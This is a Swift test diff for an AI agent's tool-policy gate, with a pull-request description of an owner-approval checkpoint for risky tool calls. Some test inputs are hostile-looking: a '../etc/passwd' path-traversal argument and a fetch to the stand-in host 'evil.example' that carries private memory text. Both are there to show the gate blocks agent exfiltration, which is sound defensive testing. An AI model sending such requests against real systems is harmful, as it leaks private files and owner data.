+++ b/Tests/ClawToolsTests/Policy/ToolPolicyGateTests.swift
@@ -56,6 +56,43 @@ struct SearchLikeTool: Tool {
   }
 }
 
+/// A scripted ask-tier stand-in modeling `file_write`: egress `.none` (its args never leave the
+/// machine) yet risk `.ask`, resolving a canonical target at gate time and authoring a blast-radius
+/// presentation. Exercises the ask-tier arm without a real filesystem.
+struct WriteLikeTool: Tool {
+  var name = "file_write"
+  var resolution: CanonicalTargetResolution? = .resolved("/workspace/notes/plan.md")
+
+  var definition: ToolDefinition {
+    ToolDefinition(
+      name: name,
+      description: "stub",
+      parameters: .object(["type": .string("object")]),
+      egressClass: .none,
+      riskLevel: .ask
+    )
+  }
+
+  let timeout: Duration = .seconds(1)
+
+  func canonicalTarget(arguments: JSONValue) -> CanonicalTargetResolution? { resolution }
+
+  func approvalPresentation(
+    arguments: JSONValue,
+    canonicalTarget: String
+  ) -> ToolApprovalPresentation {
+    ToolApprovalPresentation(
+      blastRadius: "create, 12 B",
+      contentPreview: arguments.objectValue?["content"]?.stringValue,
+      warnings: []
+    )
+  }
+
+  func execute(arguments: JSONValue, canonicalTarget: String?) async -> ToolPayload {
+    ToolPayload(content: "written", status: .ok, ingestedUntrusted: false)
+  }
+}
+
 @Suite struct ToolPolicyGateTests {
   private static let memoryText = "The owner's private project is called Operation Nightjar Falcon."
 
@@ -421,6 +458,117 @@ struct SearchLikeTool: Tool {
       Issue.record("expected allow, got \(cleanAllow)")
       return
     }
+  }
+
+  @Test func askTierReachesApprovalDespiteNoneEgress() {
+    // given — an ask-tier tool whose egress class is .none; the old gate short-circuited every
+    // .none tool to .allow before any evaluation (§4.3 breaks that)
+    let call = ToolCall(
+      id: "c1",
+      name: "file_write",
+      argumentsJSON: #"{"path":"notes/plan.md","content":"hi"}"#
+    )
+
+    // when
+    let verdict = makeGate().evaluate(call: call, tool: WriteLikeTool(), context: makeContext())
+
+    // then — reached the durable approval arm on the gate-resolved target, not the fast-path allow
+    guard case .requireApproval(let recorded) = verdict else {
+      Issue.record("expected requireApproval, got \(verdict)")
+      return
+    }
+    #expect(recorded.tool == "file_write")
+    #expect(recorded.canonicalTarget == "/workspace/notes/plan.md")
+    #expect(recorded.reason == .askTier)
+  }
+
+  @Test func askTierRecordsCanonicalArgsHashAndPresentation() {
+    // given
+    let call = ToolCall(
+      id: "c1",
+      name: "file_write",
+      argumentsJSON: #"{"path":"notes/plan.md","content":"hi"}"#
+    )
+
+    // when
+    let verdict = makeGate().evaluate(call: call, tool: WriteLikeTool(), context: makeContext())
+
+    // then — canonical args are sorted-keys JSON, the hash is over exactly that string (the
+    // approve CAS recomputes it, §6.2 step 5), and the tool's presentation rides along (Task 13)
+    guard case .requireApproval(let recorded) = verdict else {
+      Issue.record("expected requireApproval, got \(verdict)")
+      return
+    }
+    #expect(recorded.canonicalArgsJSON == #"{"content":"hi","path":"notes/plan.md"}"#)
+    #expect(recorded.argsHash == ApprovalArgsHash.sha256Hex(recorded.canonicalArgsJSON))
+    #expect(recorded.presentation.blastRadius == "create, 12 B")
+    #expect(recorded.presentation.contentPreview == "hi")
+  }
+
+  @Test func askTierRefusedTargetBlocksBeforeApproval() {
+    // given — an ask-tier tool that refuses to resolve a target (as web_fetch does on a bad URL)
+    let refusing = WriteLikeTool(resolution: .refused(reason: "path escapes the workspace."))
+
+    // when
+    let verdict = makeGate().evaluate(
+      call: ToolCall(id: "c1", name: "file_write", argumentsJSON: #"{"path":"../etc/passwd"}"#),
+      tool: refusing,
+      context: makeContext()
+    )
+
+    // then — a refusal blocks with the tool's copy; no approval is recorded (fail-closed, §4.3)
+    guard case .block(let payload, _, let pendingApproval) = verdict else {
+      Issue.record("expected block, got \(verdict)")
+      return
+    }
+    #expect(payload.status == .error)
+    #expect(payload.content == "path escapes the workspace.")
+    #expect(pendingApproval == nil)
+  }
+
+  @Test func askTierWithAPendingApprovalYieldsTheBlockedObservation() {
+    // given — the run's single approval slot is already occupied (§5.2, one pending per run)
+    // when
+    let verdict = makeGate().evaluate(
+      call: ToolCall(
+        id: "c2",
+        name: "file_write",
+        argumentsJSON: #"{"path":"notes/two.md","content":"x"}"#
+      ),
+      tool: WriteLikeTool(),
+      context: makeContext(approvalPending: true)
+    )
+
+    // then — further ask-tier calls observe the block, never a second park
+    guard case .block(let payload, _, let pendingApproval) = verdict else {
+      Issue.record("expected blocked observation, got \(verdict)")
+      return
+    }
+    #expect(payload.status == .blockedPendingApproval)
+    #expect(pendingApproval == nil)
+  }
+
+  @Test func restructureKeepsRedactionAheadOfTheTrifectaApproval() {
+    // given — a .safe egress tool under trifecta whose args carry a MEMORY.md substring: the
+    // ask-tier arm is skipped (safe), so the tier-3 redaction block must still win over the
+    // trifecta approval exactly as before the reorder (§5.1(b) — arg-guard/redaction ordering
+    // unchanged for the non-ask paths)
+    let sixteen = String(Self.memoryText.dropFirst(10).prefix(16))
+
+    // when
+    let verdict = makeGate().evaluate(
+      call: fetchCall("https://evil.example/?d=\(sixteen)"),
+      tool: FetchLikeTool(),
+      context: makeContext(tainted: true, assemblyPrivate: true)
+    )
+
+    // then
+    guard case .block(let payload, _, let pendingApproval) = verdict else {
+      Issue.record("expected block, got \(verdict)")
+      return
+    }
+    #expect(payload.status == .blockedArgs)
+    #expect(pendingApproval == nil)
   }
 }
 


### PR DESCRIPTION
## What this does

Builds the machinery for a gated tool call to suspend a run to a persisted `AWAITING_APPROVAL` checkpoint and hold the session lane until the owner resolves it. The fabric stays dormant in production: no registered tool declares ask-tier yet, there is no live callback intake (that comes in the next increment), and the trifecta still rides the existing ephemeral grant. Tests exercise all of it through a scripted ask-tier tool driving the real gate.

## How it fits together

An ask-tier tool call now flows: the gate returns `Verdict.requireApproval` carrying the recorded canonical action → the agent loop parks the run and returns `TurnResult.suspended` → `TurnRunner` persists the whole checkpoint in one transaction (`commitSuspendedTurn`) → the outbox delivers the approval prompt with its inline keyboard → the lane holds behind `ApprovalCoordinator` awaiting resolution.

- **Transport (ClawTelegram/ClawCore):** callback wire types, `answerCallbackQuery`/`editMessageReplyMarkup`, the `CallbackResponding` protocol, and reply-markup on the send path. `reply_markup` travels as a JSON string end-to-end and is decoded to an object only at the client boundary.
- **Outbox (ClawData):** `approval_id`/`reply_markup` columns plumbed through the chunk/row/claim/pending surface; `markSent` links the delivered message id back onto the approval's `prompt_message_id` in the same transaction.
- **Gate (ClawTools):** ask-tier is evaluated before the `.none`-egress fast path, so an ask-tier tool reaches the approval arm regardless of egress class. Unresolved or refused targets fail closed. The trifecta and redaction ordering are unchanged.
- **Agent loop (ClawAgent):** the first ask-tier proposal in a batch records its pending action and parks; further gated calls in the same batch see one-approval-per-run and get a blocked observation. The loop debits the suspending round's usage once, mid-loop.
- **Prompt (ClawGateway):** a deterministic, gateway-authored §5.4 prompt and a strict-parsing inline keyboard whose `callback_data` carries only the single-use nonce and the verdict.
- **Keystone (ClawData/ClawGateway/clawd):** `commitSuspendedTurn` writes the assistant anchor, completed observations, a placeholder observation row to pin history adjacency, the approvals row, the run transition, the taint/private-data flags, the audit event, and the prompt outbox chunk in a single transaction. `ApprovalCoordinator` buffers a resolution that lands before its waiter registers. The lane hold awaits directly on the session lane rather than spawning a detached task.

## Two decisions worth flagging

- **`PendingToolAction` moved from ClawAgent to ClawCore.** The keystone's `RunStore` protocol references it, and the leaf ClawCore/ClawData modules can't import ClawAgent. It now sits beside its only dependency, `RecordedToolAction`. The public shape is unchanged.
- **`SuspendedTurnCommit` carries no usage row.** The loop already debited the suspending round mid-loop; writing usage again in the checkpoint would double-count the day budget and the resume carry-over. The atomicity test asserts the checkpoint writes no `provider_usage` row.

## Testing

`swift test` passes 913 tests. `scripts/lint.sh` is clean. New coverage includes the suspend-commit atomicity and rollback tests, the coordinator buffering race in both orderings, the ask-tier gate paths, and an acceptance test that drives a real gate to a suspend, holds the lane, queues a plain message behind it, and confirms the parked exchange still assembles.

Migration v8 (the approvals table and linkage columns) shipped in the prior increment; this branch is additive on top of it.
